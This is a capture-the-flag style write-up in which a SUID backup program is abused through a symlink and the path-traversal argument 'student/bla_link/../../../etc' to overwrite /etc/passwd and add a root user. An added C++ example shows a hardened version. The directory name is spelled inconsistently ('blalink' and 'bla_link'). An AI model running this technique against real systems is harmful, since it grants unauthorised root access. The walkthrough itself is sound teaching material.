SUID bit Privilege Escalation Challenge
This is a really interesting one.
We have to work with symlinks here.
The command to create a symlink:
ln -s <path> <symlink_name>
Using this command I found a suspicious file:
find / -perm -u=s -type f 2>/dev/null
/usr/local/bin/backup
This is not an ordinary file.
In the same folder I found its C++ source.
Reading the source shows that the program takes a user name and creates a backup of that user's home directory.
There was a line like this: Copydir("/home/" + user, "/backups/" + user)
We specify the user as the program's argument, like this:
backup <user>
Obviously, we can put any payload in the user argument, since it is pasted straight into both paths. What we want to do is add a new root user by overwriting /etc/passwd.
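As an added, defensive example (editor's code, not the challenge's backup program), here is the concatenation the write-up quotes beside a hardened version that accepts only a plain account name and verifies that the resolved source stays under /home; the function names and the username rule are my own assumptions.

```cpp
#include <limits.h>
#include <stdlib.h>
#include <string>

// Vulnerable form, as the write-up describes it: the argument is spliced into
// the source and destination paths unchanged, so separators and ".." in it
// walk out of /home and /backups.
std::string unsafe_source(const std::string& user) {
    return "/home/" + user;
}

// Hardened check 1: the argument must be a plain account name, i.e. a single
// path component. Conservative rule (assumption): lowercase letters, digits,
// '_' and '-', starting with a letter or '_', at most 32 characters.
bool is_valid_username(const std::string& user) {
    if (user.empty() || user.size() > 32) return false;
    for (std::size_t i = 0; i < user.size(); ++i) {
        unsigned char c = user[i];
        bool alpha = c >= 'a' && c <= 'z';
        bool digit = c >= '0' && c <= '9';
        if (i == 0 && !(alpha || c == '_')) return false;
        if (!(alpha || digit || c == '_' || c == '-')) return false;
    }
    return true;
}

// Hardened check 2: resolve symlinks and ".." with realpath() and require the
// result to stay under `root`, so a symlink planted inside the home directory
// cannot redirect the copy somewhere else.
bool resolves_under(const std::string& path, const std::string& root) {
    char buf[PATH_MAX];
    if (realpath(path.c_str(), buf) == nullptr) return false;  // missing or unresolvable
    std::string real(buf);
    return real == root || real.compare(0, root.size() + 1, root + "/") == 0;
}

// Returns the validated source directory, or "" when the request must be refused.
std::string safe_source(const std::string& user) {
    if (!is_valid_username(user)) return "";
    std::string src = "/home/" + user;
    return resolves_under(src, "/home") ? src : "";
}
```

The realpath() check still leaves a window between check and copy, so a SUID tool should additionally drop privileges before copying and open files with O_NOFOLLOW rather than trust the path alone.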
I drew the following scheme to make it easier to understand.
And one more:
Now we create a plain directory named blalink in student's home directory
and make a backup:
mkdir blalink
/usr/local/bin/backup student
Now we delete the directory we just created and, following the scheme attached above, make a symlink with the same name.
Don't forget to copy the passwd file and modify it.
Now, let's run the backup again:
backup student/bla_link/../../../etc
And here we go.